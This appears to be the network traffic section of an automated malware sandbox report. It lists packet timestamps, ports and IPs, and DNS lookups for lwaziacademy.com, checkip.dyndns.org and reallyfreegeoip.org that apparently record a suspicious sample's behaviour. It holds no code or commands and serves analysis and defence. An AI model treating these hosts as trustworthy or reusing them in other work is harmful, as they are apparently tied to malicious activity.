                                                                                                                                            Jan 3, 2025 20:39:59.720040083 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.720046043 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.720182896 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.720911980 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.720931053 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.721002102 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.721002102 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.721008062 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.721103907 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.746623993 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.746639013 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.746691942 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.746697903 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.746725082 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.746834993 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.806438923 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.806456089 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.806526899 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.806535959 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.806603909 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.926366091 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.926384926 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.926465034 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.926474094 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.926522017 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.926837921 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.926852942 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.926927090 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.926927090 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.926934004 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.927109003 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.927335978 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.927352905 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.927515984 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.927520990 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.927577019 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.927598000 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.927613020 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.927618027 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.927630901 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.927747011 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.927927971 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.927942991 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.928020954 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.928025961 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.928113937 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.928306103 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.928320885 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.928452015 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.928457975 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.928541899 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.928754091 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.928786993 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.928822041 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.928832054 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.928862095 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.929050922 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.929074049 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.929088116 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.929091930 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:39:59.929116011 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:39:59.929287910 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.018215895 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.018233061 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.018320084 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.018320084 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.018327951 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.018435955 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.018524885 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.018542051 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.018609047 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.018614054 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.018661976 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.018788099 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.018804073 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.018878937 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.018878937 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.018882990 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.018954039 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.019066095 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.019085884 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.019157887 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.019157887 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.019162893 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.019330978 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.019364119 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.019377947 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.019529104 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.019534111 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.019634008 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.019790888 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.019805908 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.019927025 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.019932032 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.019990921 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.020052910 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.020067930 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.020131111 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.020137072 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.020226955 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.020447969 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.020462990 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.020539045 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.020539045 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.020545006 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.020643950 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.137993097 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.138009071 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.138318062 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.138361931 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.138375998 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.138401985 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.138426065 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.138776064 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.138789892 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.138811111 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.138895035 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.138895035 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.138900995 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.139051914 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.139069080 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.139166117 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.139166117 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.139172077 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.139327049 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.139341116 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.139692068 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.139700890 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.139817953 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.139836073 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.139909029 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.139909029 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.139914036 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.140182018 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.140198946 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.140271902 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.140271902 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.140276909 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.140455008 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.140482903 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.140517950 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.140522957 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.140558004 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.142448902 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.229448080 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.229460955 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.229552031 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.229558945 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.229609966 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.229917049 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.229933023 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.230041027 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.230046034 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.230304003 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.230751991 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.230766058 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.230905056 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.230911016 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.231002092 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.231004000 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.231012106 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.231051922 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.231095076 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.231173038 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.231177092 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.231333017 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.231349945 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.231364965 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.231453896 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.231453896 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.231460094 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.231618881 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.231637001 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.231652975 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.231657028 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.231678963 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.231751919 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.232036114 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.232049942 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.232124090 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.232124090 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.232129097 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.232173920 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.232331991 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.232359886 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.232397079 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.232402086 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.232434034 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.232484102 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.349452972 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.349478960 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.349554062 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.349554062 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.349565029 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.349644899 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.349828959 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.349843025 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.349915981 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.349921942 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.350018978 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.350255966 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.350270033 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.350311995 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.350316048 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.350347996 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.350393057 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.353579998 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.353595018 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.353679895 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.353679895 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.353686094 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.353857994 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.353899956 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.353914022 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.353987932 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.353987932 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.353993893 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.354146004 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.354208946 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.354226112 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.354370117 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.354383945 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.354444027 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.354542017 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.354562044 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.354605913 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.354612112 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.354758978 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.354778051 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.354792118 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.354854107 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.354859114 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.354901075 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.441052914 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.441087008 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.441163063 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.441163063 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.441169977 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.441195965 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.441225052 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.441231012 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.441265106 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.441323042 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.441421986 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.442115068 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.442115068 CET49705443192.168.2.541.185.8.252
                                                                                                                                            Jan 3, 2025 20:40:00.442133904 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:00.442142010 CET4434970541.185.8.252192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:05.323126078 CET4970680192.168.2.5158.101.44.242
                                                                                                                                            Jan 3, 2025 20:40:05.327924967 CET8049706158.101.44.242192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:05.327994108 CET4970680192.168.2.5158.101.44.242
                                                                                                                                            Jan 3, 2025 20:40:05.328372955 CET4970680192.168.2.5158.101.44.242
                                                                                                                                            Jan 3, 2025 20:40:05.333133936 CET8049706158.101.44.242192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:14.460736036 CET8049706158.101.44.242192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:14.511964083 CET4970680192.168.2.5158.101.44.242
                                                                                                                                            Jan 3, 2025 20:40:14.516839981 CET8049706158.101.44.242192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:15.852946043 CET8049706158.101.44.242192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:15.970438004 CET49708443192.168.2.5188.114.96.3
                                                                                                                                            Jan 3, 2025 20:40:15.970474005 CET44349708188.114.96.3192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:15.970592976 CET49708443192.168.2.5188.114.96.3
                                                                                                                                            Jan 3, 2025 20:40:15.972517967 CET4970680192.168.2.5158.101.44.242
                                                                                                                                            Jan 3, 2025 20:40:16.033756018 CET49708443192.168.2.5188.114.96.3
                                                                                                                                            Jan 3, 2025 20:40:16.033773899 CET44349708188.114.96.3192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:16.526864052 CET44349708188.114.96.3192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:16.526937008 CET49708443192.168.2.5188.114.96.3
                                                                                                                                            Jan 3, 2025 20:40:16.533046007 CET49708443192.168.2.5188.114.96.3
                                                                                                                                            Jan 3, 2025 20:40:16.533055067 CET44349708188.114.96.3192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:16.533379078 CET44349708188.114.96.3192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:16.632256031 CET49708443192.168.2.5188.114.96.3
                                                                                                                                            Jan 3, 2025 20:40:16.675342083 CET44349708188.114.96.3192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:16.753262997 CET44349708188.114.96.3192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:16.753340006 CET44349708188.114.96.3192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:16.753393888 CET49708443192.168.2.5188.114.96.3
                                                                                                                                            Jan 3, 2025 20:40:16.764595032 CET49708443192.168.2.5188.114.96.3
                                                                                                                                            Jan 3, 2025 20:40:32.444370031 CET5237653192.168.2.5162.159.36.2
                                                                                                                                            Jan 3, 2025 20:40:32.449171066 CET5352376162.159.36.2192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:32.451649904 CET5237653192.168.2.5162.159.36.2
                                                                                                                                            Jan 3, 2025 20:40:32.463469982 CET5352376162.159.36.2192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:32.906387091 CET5237653192.168.2.5162.159.36.2
                                                                                                                                            Jan 3, 2025 20:40:32.911843061 CET5352376162.159.36.2192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:32.911894083 CET5237653192.168.2.5162.159.36.2
                                                                                                                                            Jan 3, 2025 20:41:20.820555925 CET8049706158.101.44.242192.168.2.5
                                                                                                                                            Jan 3, 2025 20:41:20.820617914 CET4970680192.168.2.5158.101.44.242
                                                                                                                                            Jan 3, 2025 20:41:55.883332014 CET4970680192.168.2.5158.101.44.242
                                                                                                                                            Jan 3, 2025 20:41:55.889401913 CET8049706158.101.44.242192.168.2.5
                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Jan 3, 2025 20:39:56.785871983 CET6246153192.168.2.51.1.1.1
                                                                                                                                            Jan 3, 2025 20:39:57.435594082 CET53624611.1.1.1192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:05.279599905 CET5563253192.168.2.51.1.1.1
                                                                                                                                            Jan 3, 2025 20:40:05.286645889 CET53556321.1.1.1192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:15.962210894 CET6452753192.168.2.51.1.1.1
                                                                                                                                            Jan 3, 2025 20:40:15.969821930 CET53645271.1.1.1192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:32.163083076 CET5363628162.159.36.2192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:32.929462910 CET6518553192.168.2.51.1.1.1
                                                                                                                                            Jan 3, 2025 20:40:32.937082052 CET53651851.1.1.1192.168.2.5
                                                                                                                                            Jan 3, 2025 20:40:34.318243027 CET5640953192.168.2.51.1.1.1
                                                                                                                                            Jan 3, 2025 20:40:34.335623980 CET53564091.1.1.1192.168.2.5
                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                            Jan 3, 2025 20:39:56.785871983 CET192.168.2.51.1.1.10x8f6bStandard query (0)lwaziacademy.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 3, 2025 20:40:05.279599905 CET192.168.2.51.1.1.10x3ebfStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                            Jan 3, 2025 20:40:15.962210894 CET192.168.2.51.1.1.10x8787Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                            Jan 3, 2025 20:40:32.929462910 CET192.168.2.51.1.1.10x3628Standard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                            Jan 3, 2025 20:40:34.318243027 CET192.168.2.51.1.1.10x525eStandard query (0)212.20.149.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
